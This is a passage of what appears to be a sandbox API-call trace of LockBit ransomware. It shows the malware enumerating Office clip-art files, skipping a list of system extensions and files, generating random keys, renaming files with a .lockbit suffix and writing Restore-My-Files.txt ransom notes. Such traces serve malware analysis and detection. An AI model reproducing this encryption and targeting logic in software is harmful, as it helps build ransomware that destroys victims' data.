dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0161.165] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.165] malloc (_Size=0x40068) returned 0x3df0008 [0161.165] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=96159) returned 1 [0161.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.166] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.178] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.178] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.179] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.183] free (_Block=0x1fa2ed8) [0161.183] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.183] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.184] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x15b94, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382970.JPG", cAlternateFileName="")) returned 1 [0161.184] lstrcmpiW (lpString1=".", lpString2="J0382970.JPG") returned -1 [0161.184] lstrcmpiW (lpString1="..", lpString2="J0382970.JPG") returned -1 [0161.184] PathFindExtensionW (pszPath="J0382970.JPG") returned=".JPG" [0161.184] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.184] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.184] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.184] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.184] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.184] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.184] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.184] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.184] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.184] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.185] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.185] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.186] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.186] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.186] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.186] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.186] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.186] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382970.JPG") returned 1 [0161.186] lstrcmpiW (lpString1="ntldr", lpString2="J0382970.JPG") returned 1 [0161.186] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382970.JPG") returned 1 [0161.186] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382970.JPG") returned -1 [0161.186] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382970.JPG") returned -1 [0161.186] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382970.JPG") returned 1 [0161.186] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382970.JPG") returned -1 [0161.186] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.186] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG") returned=".JPG" [0161.186] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.186] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.186] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.186] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.186] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.186] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.186] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.186] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.186] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.187] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.187] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.187] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.187] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.187] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.187] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.187] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.187] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.187] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG.lockbit") returned 72 [0161.187] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382970.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.188] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.188] malloc (_Size=0x40068) returned 0x1ff1e60 [0161.189] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=88980) returned 1 [0161.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0161.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0161.190] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.195] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.195] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.195] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.199] free (_Block=0x1fa2ed8) [0161.199] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.199] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.199] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.199] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x190e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0384862.JPG", cAlternateFileName="")) returned 1 [0161.200] lstrcmpiW (lpString1=".", lpString2="J0384862.JPG") returned -1 [0161.200] lstrcmpiW (lpString1="..", lpString2="J0384862.JPG") returned -1 [0161.200] PathFindExtensionW (pszPath="J0384862.JPG") returned=".JPG" [0161.200] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.200] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.200] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.201] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.201] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.201] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.201] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.201] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.201] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.201] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.201] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.202] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.202] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.202] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.202] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0384862.JPG") returned 1 [0161.202] lstrcmpiW (lpString1="ntldr", lpString2="J0384862.JPG") returned 1 [0161.202] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0384862.JPG") returned 1 [0161.202] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0384862.JPG") returned -1 [0161.202] lstrcmpiW (lpString1="autorun.inf", lpString2="J0384862.JPG") returned -1 [0161.202] lstrcmpiW (lpString1="thumbs.db", lpString2="J0384862.JPG") returned 1 [0161.202] lstrcmpiW (lpString1="iconcache.db", lpString2="J0384862.JPG") returned -1 [0161.202] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.202] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG") returned=".JPG" [0161.202] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.202] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.202] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.202] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.203] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.203] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.203] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.203] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.203] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.203] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.203] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.203] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG.lockbit") returned 72 [0161.203] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384862.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.204] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.205] malloc (_Size=0x40068) returned 0x1ff1e60 [0161.205] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=102633) returned 1 [0161.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0161.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0161.206] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.211] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.211] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.211] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.215] free (_Block=0x1fa2ed8) [0161.215] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.215] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.215] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.216] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x17b79, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0384885.JPG", cAlternateFileName="")) returned 1 [0161.216] lstrcmpiW (lpString1=".", lpString2="J0384885.JPG") returned -1 [0161.216] lstrcmpiW (lpString1="..", lpString2="J0384885.JPG") returned -1 [0161.216] PathFindExtensionW (pszPath="J0384885.JPG") returned=".JPG" [0161.217] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.217] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.217] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.218] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.218] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.218] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.218] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.218] lstrcmpiW 